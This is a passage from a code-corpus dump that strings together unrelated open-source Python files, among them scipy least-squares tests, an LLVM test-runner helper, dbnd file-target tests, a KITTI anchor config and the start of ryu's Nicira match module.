return self.log.name if self.log is not None else None
|
edafa/ClassPredictor.py
|
andrewekhalel/tf_predictor
| 134 |
67353
|
<reponame>andrewekhalel/tf_predictor<gh_stars>100-1000
from .BasePredictor import BasePredictor
from .exceptions import UnsupportedDataType
import numpy as np
class ClassPredictor(BasePredictor):
def __init__(self,conf):
"""
Initialize class
:param conf: configuration (json string or file path)
"""
super().__init__(conf=conf)
def reverse_aug(self,aug_patch):
"""
Reverse augmentations applied and calculate their combined mean
:param aug_patch: set of prediction of the model to different augmentations
:returns: single combined patch
"""
if isinstance(aug_patch,np.ndarray):
if self.mean == "ARITH":
return np.mean(aug_patch,axis=0)
elif self.mean == "GEO":
product = np.prod(aug_patch,axis=0)
return product ** (1./len(self.augs))
elif isinstance(aug_patch,list):
try:
aug_patch = np.array(aug_patch)
return np.mean(aug_patch,axis=0)
except:
averaged = []
for output in aug_patch:
averaged.append([sum(e)/len(e) for e in zip(*output)])
return averaged
else:
raise UnsupportedDataType('Data type "%s" produced by your model is not supported.\
list and numpy arrays are the only supported types.'%aug_patch.dtype)
def _predict_single(self,img):
"""
predict single image
:param img: image to predict
:return: prediction on the image
"""
aug_patches = self.apply_aug(img)
pred = self.predict_patches(aug_patches)
return self.reverse_aug(pred)
|
lib/python2.7/site-packages/scipy/optimize/tests/test_lsq_linear.py
|
wfehrnstrom/harmonize
| 6,989 |
67356
|
import numpy as np
from numpy.linalg import lstsq
from numpy.testing import (assert_allclose, assert_equal, assert_,
run_module_suite, assert_raises)
from scipy.sparse import rand
from scipy.sparse.linalg import aslinearoperator
from scipy.optimize import lsq_linear
A = np.array([
[0.171, -0.057],
[-0.049, -0.248],
[-0.166, 0.054],
])
b = np.array([0.074, 1.014, -0.383])
class BaseMixin(object):
def __init__(self):
self.rnd = np.random.RandomState(0)
def test_dense_no_bounds(self):
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, method=self.method, lsq_solver=lsq_solver)
assert_allclose(res.x, lstsq(A, b)[0])
def test_dense_bounds(self):
# Solutions for comparison are taken from MATLAB.
lb = np.array([-1, -10])
ub = np.array([1, 0])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, lstsq(A, b)[0])
lb = np.array([0.0, -np.inf])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, np.inf), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([0.0, -4.084174437334673]),
atol=1e-6)
lb = np.array([-1, 0])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, np.inf), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([0.448427311733504, 0]),
atol=1e-15)
ub = np.array([np.inf, -5])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (-np.inf, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([-0.105560998682388, -5]))
ub = np.array([-1, np.inf])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (-np.inf, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([-1, -4.181102129483254]))
lb = np.array([0, -4])
ub = np.array([1, 0])
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, np.array([0.005236663400791, -4]))
def test_dense_rank_deficient(self):
A = np.array([[-0.307, -0.184]])
b = np.array([0.773])
lb = [-0.1, -0.1]
ub = [0.1, 0.1]
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.x, [-0.1, -0.1])
A = np.array([
[0.334, 0.668],
[-0.516, -1.032],
[0.192, 0.384],
])
b = np.array([-1.436, 0.135, 0.909])
lb = [0, -1]
ub = [1, -0.5]
for lsq_solver in self.lsq_solvers:
res = lsq_linear(A, b, (lb, ub), method=self.method,
lsq_solver=lsq_solver)
assert_allclose(res.optimality, 0, atol=1e-11)
def test_full_result(self):
lb = np.array([0, -4])
ub = np.array([1, 0])
res = lsq_linear(A, b, (lb, ub), method=self.method)
assert_allclose(res.x, [0.005236663400791, -4])
r = A.dot(res.x) - b
assert_allclose(res.cost, 0.5 * np.dot(r, r))
assert_allclose(res.fun, r)
assert_allclose(res.optimality, 0.0, atol=1e-12)
assert_equal(res.active_mask, [0, -1])
assert_(res.nit < 15)
assert_(res.status == 1 or res.status == 3)
assert_(isinstance(res.message, str))
assert_(res.success)
class SparseMixin(object):
def test_sparse_and_LinearOperator(self):
m = 5000
n = 1000
A = rand(m, n, random_state=0)
b = self.rnd.randn(m)
res = lsq_linear(A, b)
assert_allclose(res.optimality, 0, atol=1e-6)
A = aslinearoperator(A)
res = lsq_linear(A, b)
assert_allclose(res.optimality, 0, atol=1e-6)
def test_sparse_bounds(self):
m = 5000
n = 1000
A = rand(m, n, random_state=0)
b = self.rnd.randn(m)
lb = self.rnd.randn(n)
ub = lb + 1
res = lsq_linear(A, b, (lb, ub))
assert_allclose(res.optimality, 0.0, atol=1e-8)
res = lsq_linear(A, b, (lb, ub), lsmr_tol=1e-13)
assert_allclose(res.optimality, 0.0, atol=1e-8)
res = lsq_linear(A, b, (lb, ub), lsmr_tol='auto')
assert_allclose(res.optimality, 0.0, atol=1e-8)
class TestTRF(BaseMixin, SparseMixin):
method = 'trf'
lsq_solvers = ['exact', 'lsmr']
class TestBVLS(BaseMixin):
method = 'bvls'
lsq_solvers = ['exact']
if __name__ == '__main__':
run_module_suite()
|
courses/backend/django-for-everybody/Web Application Technologies and Django/resources/dj4e-samples/tagme/admin.py
|
Nahid-Hassan/fullstack-software-development
| 297 |
67369
|
<gh_stars>100-1000
from django.contrib import admin
# Register your models here.
from tagme.models import Forum, Comment
admin.site.register(Forum)
admin.site.register(Comment)
|
libcxx/utils/run.py
|
mkinsner/llvm
| 2,338 |
67390
|
<gh_stars>1000+
#!/usr/bin/env python
#===----------------------------------------------------------------------===##
#
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
#===----------------------------------------------------------------------===##
"""run.py is a utility for running a program.
It can perform code signing, forward arguments to the program, and return the
program's error code.
"""
import argparse
import os
import platform
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--execdir', type=str, required=True)
parser.add_argument('--codesign_identity', type=str, required=False, default=None)
parser.add_argument('--env', type=str, nargs='*', required=False, default=dict())
parser.add_argument("command", nargs=argparse.ONE_OR_MORE)
args = parser.parse_args()
commandLine = args.command
# HACK:
# If an argument is a file that ends in `.tmp.exe`, assume it is the name
# of an executable generated by a test file. We call these test-executables
# below. This allows us to do custom processing like codesigning test-executables.
# It's also possible for there to be no such executable, for example in the case
# of a .sh.cpp test.
isTestExe = lambda exe: exe.endswith('.tmp.exe') and os.path.exists(exe)
# Do any necessary codesigning of test-executables found in the command line.
if args.codesign_identity:
for exe in filter(isTestExe, commandLine):
subprocess.check_call(['xcrun', 'codesign', '-f', '-s', args.codesign_identity, exe], env={})
# Extract environment variables into a dictionary
env = {k : v for (k, v) in map(lambda s: s.split('=', 1), args.env)}
if platform.system() == 'Windows':
# Pass some extra variables through on Windows:
# COMSPEC is needed for running subprocesses via std::system().
if 'COMSPEC' in os.environ:
env['COMSPEC'] = os.environ.get('COMSPEC')
# TEMP is needed for placing temp files in a sensible directory.
if 'TEMP' in os.environ:
env['TEMP'] = os.environ.get('TEMP')
# Run the command line with the given environment in the execution directory.
return subprocess.call(commandLine, cwd=args.execdir, env=env, shell=False)
if __name__ == '__main__':
exit(main())
|
plugins/dbnd-test-scenarios/src/dbnd_test_scenarios/test_common/targets/base_target_test_mixin.py
|
ipattarapong/dbnd
| 224 |
67415
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
import abc
import os
import random
import pandas as pd
import pytest
from pandas.util.testing import assert_frame_equal
from pytest import fixture
import targets
import targets.errors
import targets.pipes
from dbnd.testing.helpers_pytest import skip_on_windows
from targets import DataTarget, target
class TestException(Exception):
pass
class FileTargetTestMixin(object):
"""All Target that take bytes (python2: str) should pass those
tests. In addition, a test to verify the method `exists`should be added
"""
@fixture(autouse=True)
def _current_request(self, request):
self._current_request = request
self._id = request.node.name
def assertCleanUp(self, tmp_path=""):
pass
@abc.abstractmethod
def create_target(self, io_pipe=None):
# type: (...)->DataTarget
pass
def test_atomicity(self):
target = self.create_target()
fobj = target.open("w")
assert not target.exists()
fobj.close()
assert target.exists()
def test_readback(self):
target = self.create_target()
origdata = "lol\n"
fobj = target.open("w")
fobj.write(origdata)
fobj.close()
fobj = target.open("r")
data = fobj.read()
assert origdata == data
def test_unicode_obj(self):
target = self.create_target()
origdata = u"lol\n"
fobj = target.open("w")
fobj.write(origdata)
fobj.close()
fobj = target.open("r")
data = fobj.read()
assert origdata == data
def test_with_close(self):
target = self.create_target()
with target.open("w") as fobj:
tp = getattr(fobj, "tmp_path", "")
fobj.write("hej\n")
self.assertCleanUp(tp)
assert target.exists()
def test_with_exception(self):
target = self.create_target()
a = {}
def foo():
with target.open("w") as fobj:
fobj.write("hej\n")
a["tp"] = getattr(fobj, "tmp_path", "")
raise TestException("Test triggered exception")
with pytest.raises(TestException):
foo()
self.assertCleanUp(a["tp"])
assert not target.exists()
def test_del(self):
t = self.create_target()
p = t.open("w")
print("test", file=p)
tp = getattr(p, "tmp_path", "")
del p
self.assertCleanUp(tp)
assert not t.exists()
def test_write_cleanup_no_close(self):
t = self.create_target()
def context():
f = t.open("w")
f.write("stuff")
return getattr(f, "tmp_path", "")
tp = context()
import gc
gc.collect() # force garbage collection of f variable
self.assertCleanUp(tp)
assert not t.exists()
def test_text(self):
t = self.create_target(targets.pipes.UTF8)
a = u"我éçф"
with t.open("w") as f:
f.write(a)
with t.open("r") as f:
b = f.read()
assert a == b
def test_del_with_Text(self):
t = self.create_target(targets.pipes.UTF8)
p = t.open("w")
print(u"test", file=p)
tp = getattr(p, "tmp_path", "")
del p
self.assertCleanUp(tp)
assert not t.exists()
def test_format_injection(self):
class CustomFormat(targets.pipes.IOPipeline):
def pipe_reader(self, input_pipe):
input_pipe.foo = "custom read property"
return input_pipe
def pipe_writer(self, output_pipe):
output_pipe.foo = "custom write property"
return output_pipe
t = self.create_target(CustomFormat())
with t.open("w") as f:
assert f.foo == "custom write property"
with t.open("r") as f:
assert f.foo == "custom read property"
def test_binary_write(self):
t = self.create_target(targets.pipes.Nop)
with t.open("w") as f:
f.write(b"a\xf2\xf3\r\nfd")
with t.open("r") as f:
c = f.read()
assert c == b"a\xf2\xf3\r\nfd"
def test_writelines(self):
t = self.create_target()
with t.open("w") as f:
f.writelines(["a\n", "b\n", "c\n"])
with t.open("r") as f:
c = f.read()
assert c == "a\nb\nc\n"
def test_read_iterator(self):
t = self.create_target()
with t.open("w") as f:
f.write("a\nb\nc\n")
c = []
with t.open("r") as f:
for x in f:
c.append(x)
assert c == ["a\n", "b\n", "c\n"]
@skip_on_windows
def test_gzip(self):
t = self.create_target(io_pipe=targets.pipes.Gzip)
p = t.open("w")
test_data = b"test"
p.write(test_data)
# tp = getattr(p, "tmp_path", "")
assert not t.exists()
p.close()
# self.assertCleanUp(tp)
assert t.exists()
@skip_on_windows
def test_gzip_works_and_cleans_up(self):
t = self.create_target(targets.pipes.Gzip)
test_data = b"123testing"
with t.open("w") as f:
tp = getattr(f, "tmp_path", "")
f.write(test_data)
self.assertCleanUp(tp)
with t.open() as f:
result = f.read()
assert test_data == result
@pytest.mark.skip
def test_dataframe_csv_support(self):
t = self.create_target()
test_data = pd.DataFrame(data=[[1, 1], [2, 2]], columns=["c1", "c2"])
t.as_pandas.to_csv(test_data)
result = t.as_pandas.read_csv()
assert_frame_equal(test_data, result)
@pytest.mark.skip
def test_dataframe_parquet_support(self):
t = self.create_target()
test_data = pd.DataFrame(data=[[1, 1], [2, 2]], columns=["c1", "c2"])
t.as_pandas.to_parquet(test_data)
result = t.as_pandas.read_parquet()
assert_frame_equal(test_data, result)
def test_move_on_fs(self):
# We're cheating and retrieving the fs from target.
# TODO: maybe move to "filesystem_test.py" or something
t = self.create_target()
other_path = t.path + "-" + str(random.randint(0, 999999999))
t.touch()
fs = t.fs
assert t.exists()
fs.move(t.path, other_path)
assert not t.exists()
def test_rename_dont_move_on_fs(self):
# We're cheating and retrieving the fs from target.
# TODO: maybe move to "filesystem_test.py" or something
t = self.create_target()
other_path = t.path + "-" + str(random.randint(0, 999999999))
t.touch()
fs = t.fs
assert t.exists()
fs.rename_dont_move(t.path, other_path)
assert not t.exists()
with pytest.raises(targets.errors.FileAlreadyExists):
fs.rename_dont_move(t.path, other_path)
|
dvc/command/ls/ls_colors.py
|
indhupriya/dvc
| 9,136 |
67422
|
<gh_stars>1000+
import os
class LsColors:
default = "rs=0:di=01;34:ex=01;32"
def __init__(self, lscolors=None):
self._extensions = {}
self._codes = {}
self._load(lscolors or os.environ.get("LS_COLORS") or LsColors.default)
def _load(self, lscolors):
for item in lscolors.split(":"):
try:
code, color = item.split("=", 1)
except ValueError:
continue
if code.startswith("*."):
self._extensions[code[1:]] = color
else:
self._codes[code] = color
def format(self, entry):
text = entry["path"]
if entry.get("isout", False) and "out" in self._codes:
return self._format(text, code="out")
if entry.get("isdir", False):
return self._format(text, code="di")
if entry.get("isexec", False):
return self._format(text, code="ex")
_, ext = os.path.splitext(text)
return self._format(text, ext=ext)
def _format(self, text, code=None, ext=None):
val = None
if ext:
val = self._extensions.get(ext, None)
if code:
val = self._codes.get(code, None)
if not val:
return text
rs = self._codes.get("rs", 0)
return f"\033[{val}m{text}\033[{rs}m"
|
scripts/build_singularity_container.py
|
mens-artis/Auto-PyTorch
| 1,657 |
67447
|
import os, subprocess
if __name__ == "__main__":
move_into_container = list()
if input("Do you want to move some of your local files into to container? This will overwrite files from origin/master. (y/n) ").startswith("y"):
for f in sorted(os.listdir()):
if input("Move %s into container (y/n)? " % f).startswith("y"):
move_into_container.append(f)
if move_into_container:
subprocess.call(["tar", "-czvf", "move_into_container.tar.gz"] + move_into_container)
image_name = input("Name of Image? (Default: Auto-PyTorch.simg) ") or "Auto-PyTorch.simg"
if os.path.exists(image_name) and input("%s exists. Remove (y/n)? " % image_name).startswith("y"):
os.remove(image_name)
print("Building Singularity container. You need to be root for that.")
subprocess.call(["sudo", "singularity", "build", image_name, "scripts/Singularity"])
if move_into_container:
os.remove("move_into_container.tar.gz")
|
configs/kitti_config.py
|
wqdun/MobileNet
| 1,698 |
67454
|
from easydict import EasyDict as edict
import numpy as np
config = edict()
config.IMG_HEIGHT = 375
config.IMG_WIDTH = 1242
# TODO(shizehao): infer fea shape in run time
config.FEA_HEIGHT = 12
config.FEA_WIDTH = 39
config.EPSILON = 1e-16
config.LOSS_COEF_BBOX = 5.0
config.LOSS_COEF_CONF_POS = 75.0
config.LOSS_COEF_CONF_NEG = 100.0
config.LOSS_COEF_CLASS = 1.0
config.EXP_THRESH = 1.0
config.RBG_MEANS = np.array([[[ 123.68, 116.779, 103.939]]])
def set_anchors(H, W):
B = 9
shape = np.array(
[[ 36., 37.], [ 366., 174.], [ 115., 59.],
[ 162., 87.], [ 38., 90.], [ 258., 173.],
[ 224., 108.], [ 78., 170.], [ 72., 43.]])
# # scale
# shape[:, 0] = shape[:, 0] / config.IMG_HEIGHT
# shape[:, 1] = shape[:, 1] / config.IMG_WIDTH
anchor_shapes = np.reshape(
[shape] * H * W,
(H, W, B, 2)
)
center_x = np.reshape(
np.transpose(
np.reshape(
np.array([np.arange(1, W+1)*float(config.IMG_WIDTH)/(W+1)]*H*B),
(B, H, W)
),
(1, 2, 0)
),
(H, W, B, 1)
)
center_y = np.reshape(
np.transpose(
np.reshape(
np.array([np.arange(1, H+1)*float(config.IMG_HEIGHT)/(H+1)]*W*B),
(B, W, H)
),
(2, 1, 0)
),
(H, W, B, 1)
)
anchors = np.reshape(
np.concatenate((center_x, center_y, anchor_shapes), axis=3),
(-1, 4)
)
return anchors
config.ANCHOR_SHAPE = set_anchors(config.FEA_HEIGHT, config.FEA_WIDTH)
config.NUM_ANCHORS = 9
config.NUM_CLASSES = 3
config.ANCHORS = config.NUM_ANCHORS * config.FEA_HEIGHT * config.FEA_WIDTH
config.PLOT_PROB_THRESH = 0.4
config.NMS_THRESH = 0.4
config.PROB_THRESH = 0.005
config.TOP_N_DETECTION = 64
|
tools/visualize_results_v2.py
|
kruda/DetectAndTrack
| 1,007 |
67458
|
<reponame>kruda/DetectAndTrack
##############################################################
# Copyright (c) 2018-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import os.path as osp
import sys
import cPickle as pickle
import cv2
import logging
import numpy as np
from tqdm import tqdm
from core.test_engine import get_roidb_and_dataset
import utils.vis as vis_utils
import utils.image as image_utils
from core.config import (
cfg_from_file, assert_and_infer_cfg, get_output_dir, cfg_from_list)
import utils.general as gen_utils
FORMAT = '%(levelname)s %(filename)s:%(lineno)4d: %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT, stream=sys.stdout)
logger = logging.getLogger(__name__)
def _parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--cfg', dest='cfg_file', help='Config file', type=str)
parser.add_argument(
'--thresh', dest='thresh',
help='detection prob threshold',
default=0.9, type=float)
parser.add_argument(
'opts', help='See lib/core/config.py for all options', default=None,
nargs=argparse.REMAINDER)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def _id_or_index(ix, val):
if len(val) == 0:
return val
else:
return val[ix]
def _vis_single_frame(im, cls_boxes_i, cls_segms_i, cls_keyps_i, cls_tracks_i, thresh):
res = vis_utils.vis_one_image_opencv(
im, cls_boxes_i,
segms=cls_segms_i, keypoints=cls_keyps_i,
tracks=cls_tracks_i, thresh=thresh,
show_box=True, show_class=False, linewidth=3)
if res is None:
return im
return res
def _convert_roidb_to_pred_boxes(boxes):
return np.hstack((boxes, np.ones((boxes.shape[0], 1))))
def _convert_roidb_to_pred_keyps(poses):
poses = poses.astype(np.float32)
res = []
for i in range(poses.shape[0]):
poses[i, 2, poses[i, 2, :] >= 2] += 10.0
res.append(np.vstack((poses[i], np.zeros((1, poses[i].shape[1])))))
return res
def _convert_roidb_to_pred_tracks(tracks):
return tracks.reshape((-1, )).tolist()
def _generate_visualizations(entry, ix, all_boxes, all_keyps, all_tracks, thresh):
im = image_utils.read_image_video(entry, key_frame_only=True)[0]
cls_boxes_i = [
_id_or_index(ix, all_boxes[j]) for j in range(len(all_boxes))]
if all_keyps is not None:
cls_keyps_i = [
_id_or_index(ix, all_keyps[j]) for j in range(len(all_keyps))]
else:
cls_keyps_i = None
if all_tracks is not None:
cls_tracks_i = [
_id_or_index(ix, all_tracks[j]) for j in range(len(all_tracks))]
else:
cls_tracks_i = None
pred = _vis_single_frame(
im.copy(), cls_boxes_i, None, cls_keyps_i, cls_tracks_i, thresh)
gt = _vis_single_frame(
im.copy(),
[[], _convert_roidb_to_pred_boxes(entry['boxes'])],
None,
[[], _convert_roidb_to_pred_keyps(entry['gt_keypoints'])],
[[], _convert_roidb_to_pred_tracks(entry['tracks'])],
0.1)
return gt, pred
def vis(roidb, detections_pkl, thresh, output_dir):
if len(roidb) == 0:
return
with open(detections_pkl, 'rb') as f:
dets = pickle.load(f)
all_boxes = dets['all_boxes']
if 'all_keyps' in dets:
all_keyps = dets['all_keyps']
else:
all_keyps = None
if 'all_tracks' in dets:
all_tracks = dets['all_tracks']
else:
all_tracks = None
for ix, entry in enumerate(tqdm(roidb)):
if entry['boxes'] is None or entry['boxes'].shape[0] == 0:
continue
gt, pred = _generate_visualizations(
entry, ix, all_boxes, all_keyps, all_tracks, thresh)
combined = np.hstack((gt, pred))
im_name = entry['image']
if isinstance(im_name, list):
im_name = im_name[len(im_name) // 2]
out_name = im_name[len(dataset.image_directory):]
out_path = osp.join(output_dir, out_name)
gen_utils.mkdir_p(osp.dirname(out_path))
cv2.imwrite(out_path, combined)
if __name__ == '__main__':
args = _parse_args()
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.opts is not None:
cfg_from_list(args.opts)
assert_and_infer_cfg()
test_output_dir = get_output_dir(training=False)
det_file = osp.join(test_output_dir, 'detections.pkl')
tracking_det_file = osp.join(test_output_dir, 'detections_withTracks.pkl')
if osp.exists(tracking_det_file):
det_file = tracking_det_file
output_dir = osp.join(test_output_dir, 'vis/')
if not osp.exists(det_file):
raise ValueError('Output file not found {}'.format(det_file))
else:
logger.info('Visualizing {}'.format(det_file))
# Set include_gt True when using the roidb to evalute directly. Not doing
# that currently
roidb, dataset, _, _, _ = get_roidb_and_dataset(None, include_gt=True)
vis(roidb, det_file, args.thresh, output_dir)
|
talos/reducers/forrest.py
|
zazula/talos
| 1,536 |
67472
|
def forrest(self):
'''Random Forrest based reduction strategy. Somewhat more
aggressive than for example 'spearman' because there are no
negative values, but instead the highest positive correlation
is minused from all the values so that max value is 0, and then
values are turned into positive. The one with the highest positive
score in the end will be dropped. This means that anything with
0 originally, is a candidate for dropping. Because there are multiple
zeroes in many cases, there is an element of randomness on which one
is dropped.
'''
import wrangle
import numpy as np
# handle conversion to multi_labels
from .reduce_utils import cols_to_multilabel
data = cols_to_multilabel(self)
# get the correlations
corr_values = wrangle.df_corr_randomforest(data, self.reduction_metric)
# drop labels where value is NaN
corr_values.dropna(inplace=True)
# handle the turning around of values (see docstring for more info)
corr_values -= corr_values[0]
corr_values = corr_values.abs()
# get the strongest correlation
corr_values = corr_values.index[-1]
# get the label, value, and dtype from the column header
label, dtype, value = corr_values.split('~')
# convert things back to their original dtype
value = np.array([value]).astype(dtype)[0]
# this is where we modify the parameter space accordingly
self.param_object.remove_is(label, value)
return self
|
python/setup.py
|
wangmiao1981/sparkMeasure
| 453 |
67485
|
<filename>python/setup.py<gh_stars>100-1000
#!/usr/bin/env python
from setuptools import setup, find_packages
description = 'Python API for sparkMeasure, a tool for performance troubleshooting of Apache Spark workloads'
long_description = """SparkMeasure is a tool for performance troubleshooting of Apache Spark workloads.
It simplifies the collection and analysis of Spark performance metrics. The bulk of sparkMeasure is written in Scala.
This package contains the Python API for sparkMeasure and is intended to work in conjunction with PySpark.
Use from python command line or in Jupyter notebook environments, or as a tool to instrument Python code running Spark workloads.
**[Link to sparkMeasure GitHub page and documentation](https://github.com/lucacanali/sparkMeasure)**"""
setup(name='sparkmeasure',
version='0.14.0',
description=description,
long_description=long_description,
long_description_content_type="text/markdown",
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/lucacanali/sparkMeasure',
license='Apache License, Version 2.0',
include_package_data=True,
packages=find_packages(),
zip_safe=False,
python_requires='>=2.7',
install_requires=[],
classifiers=[
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Operating System :: OS Independent',
'License :: OSI Approved :: Apache Software License',
'Intended Audience :: Developers',
'Development Status :: 4 - Beta',
]
)
|
web/test/test.py
|
thekad/clusto
| 216 |
67497
|
<filename>web/test/test.py<gh_stars>100-1000
from rest import request
from pprint import pprint
from traceback import format_exc
try: import json
except ImportError: import simplejson as json
BASE_URL = 'http://localhost:9999'
def test_default_delegate():
status, headers, data = request('GET', BASE_URL + '/')
assert status == 200
assert type(json.loads(data)) == list
return True
def test_types_delegate():
status, headers, data = request('GET', BASE_URL + '/server')
assert status == 200
data = json.loads(data)
assert type(data) == list
if len(data) > 0:
assert type(data[0]) == str
return True
def test_action_delegate():
testname = '/pool/api_test_pool'
test_create(testname)
test_create('/pool/api_test_child')
test_action_addattr(testname)
test_action_delattr(testname)
test_action_insert(testname)
test_action_remove(testname)
test_action_show(testname)
test_delete('/pool/api_test_child')
test_delete(testname)
def test_create(testname):
status, headers, data = request('POST', BASE_URL + testname)
assert status == 201
data = json.loads(data)
assert 'object' in data
assert data['object'] == testname
return True
def test_action_addattr(testname):
status, headers, data = request('GET', BASE_URL + testname + '/addattr?key=testkey&value=testvalue')
assert status == 200
data = json.loads(data)
assert type(data) == dict
assert data['attrs'] == [{'key': 'testkey', 'value': 'testvalue', 'subkey': None, 'number': None, 'datatype': 'string'}]
return True
def test_action_delattr(testname):
status, headers, data = request('GET', BASE_URL + testname + '/delattr?key=testkey')
assert status == 200
data = json.loads(data)
assert len(data['attrs']) == 0
return True
def test_action_insert(testname):
status, headers, data = request('GET', BASE_URL + testname + '/insert?object=/pool/api_test_child')
assert status == 200
data = json.loads(data)
assert data['contents'] == ['/pool/api_test_child']
return True
def test_action_remove(testname):
status, headers, data = request('GET', BASE_URL + testname + '/remove?object=/pool/api_test_child')
assert status == 200
data = json.loads(data)
assert data['contents'] == []
return True
def test_action_show(testname):
status, headers, data = request('GET', BASE_URL + testname + '/show')
assert status == 200
data = json.loads(data)
for field in ('object', 'attrs', 'contents', 'parents', 'actions'):
assert field in data.keys()
return True
def test_delete(testname):
status, headers, data = request('DELETE', BASE_URL + testname)
assert status in (200, 202, 204)
return True
if __name__ == '__main__':
test_default_delegate()
test_types_delegate()
test_action_delegate()
|
example_nodes/math_node.py
|
996268132/NodeGraphQt
| 582 |
67506
|
<filename>example_nodes/math_node.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import example_nodes.wrappers.math as math
import inspect
from functools import partial
from NodeGraphQt import BaseNode
class MathFunctionsNode(BaseNode):
"""
Math functions node.
"""
# set a unique node identifier.
__identifier__ = 'Math'
# set the initial default node name.
NODE_NAME = 'Math Functions'
mathFuncs = [func for func in dir(math) if not func.startswith('_')]
def __init__(self):
super(MathFunctionsNode, self).__init__()
self.set_color(25, 58, 51)
self.add_combo_menu('funcs', 'Functions', items=self.mathFuncs,
tab='widgets')
# switch math function type
self.view.widgets['funcs'].value_changed.connect(self.addFunction)
self.view.widgets['funcs'].value_changed.connect(self.update_stream)
self.add_output('output')
self.create_property('output', None)
self.trigger_type = 'no_inPorts'
self.view.widgets['funcs'].get_custom_widget().setCurrentIndex(2)
def addFunction(self, prop, func):
"""
Create inputs based on math functions arguments.
"""
self.func = getattr(math, func)
dataFunc = inspect.getfullargspec(self.func)
for arg in dataFunc.args:
if not self.has_property(arg):
inPort = self.add_input(arg)
inPort.trigger = True
self.create_property(arg, None)
for inPort in self._inputs:
if inPort.name() in dataFunc.args:
if not inPort.visible():
inPort.set_visible(True)
else:
inPort.set_visible(False)
def run(self):
"""
Evaluate all entries, pass them as arguments of the
chosen mathematical function.
"""
for to_port in self.input_ports():
if to_port.visible() == False:
continue
from_ports = to_port.connected_ports()
if not from_ports:
raise Exception('Port %s not connected!' % to_port.name(),
to_port)
for from_port in from_ports:
from_port.node().run()
data = from_port.node().get_property(from_port.name())
self.set_property(to_port.name(), float(data))
try:
# Execute math function with arguments.
data = self.func(*[self.get_property(inport.name()) for inport in self._inputs if inport.visible()])
self.set_property('output', data)
except KeyError as error:
print("An input is missing! %s" % str(error))
except TypeError as error:
print("Error evaluating function: %s" % str(error))
def on_input_connected(self, to_port, from_port):
"""Override node callback method."""
self.set_property(to_port.name(), from_port.node().run())
self.update_stream()
def on_input_disconnected(self, to_port, from_port):
"""Override node callback method."""
self.set_property('output', None)
self.update_stream()
|
ryu/ofproto/nx_match.py
|
hiArvin/ryu
| 269 |
67507
|
# Copyright (C) 2011, 2012 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2011, 2012 <NAME> <yamahata at valinux co jp>
# Copyright (C) 2012 <NAME> <horms ad verge net au>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
import itertools
from ryu import exception
from ryu.lib import mac
from . import ofproto_parser
from . import ofproto_v1_0
from . import inet
import logging
LOG = logging.getLogger('ryu.ofproto.nx_match')
UINT64_MAX = (1 << 64) - 1
UINT32_MAX = (1 << 32) - 1
UINT16_MAX = (1 << 16) - 1
FWW_IN_PORT = 1 << 0
FWW_DL_TYPE = 1 << 4
FWW_NW_PROTO = 1 << 5
# No corresponding OFPFW_* bits
FWW_NW_DSCP = 1 << 1
FWW_NW_ECN = 1 << 2
FWW_ARP_SHA = 1 << 3
FWW_ARP_THA = 1 << 6
FWW_IPV6_LABEL = 1 << 7
FWW_NW_TTL = 1 << 8
FWW_ALL = (1 << 13) - 1
FLOW_NW_FRAG_ANY = 1 << 0
FLOW_NW_FRAG_LATER = 1 << 1
FLOW_NW_FRAG_MASK = FLOW_NW_FRAG_ANY | FLOW_NW_FRAG_LATER
IP_ECN_MASK = 0x03
IP_DSCP_MASK = 0xfc
MF_PACK_STRING_BE64 = '!Q'
MF_PACK_STRING_BE32 = '!I'
MF_PACK_STRING_BE16 = '!H'
MF_PACK_STRING_8 = '!B'
MF_PACK_STRING_MAC = '!6s'
MF_PACK_STRING_IPV6 = '!8H'
_MF_FIELDS = {}
FLOW_N_REGS = 8 # ovs 1.5
class Flow(object):
def __init__(self):
self.in_port = 0
self.dl_vlan = 0
self.dl_vlan_pcp = 0
self.dl_src = mac.DONTCARE
self.dl_dst = mac.DONTCARE
self.dl_type = 0
self.tp_dst = 0
self.tp_src = 0
self.nw_tos = 0
self.vlan_tci = 0
self.nw_ttl = 0
self.nw_proto = 0
self.arp_sha = 0
self.arp_tha = 0
self.nw_src = 0
self.nw_dst = 0
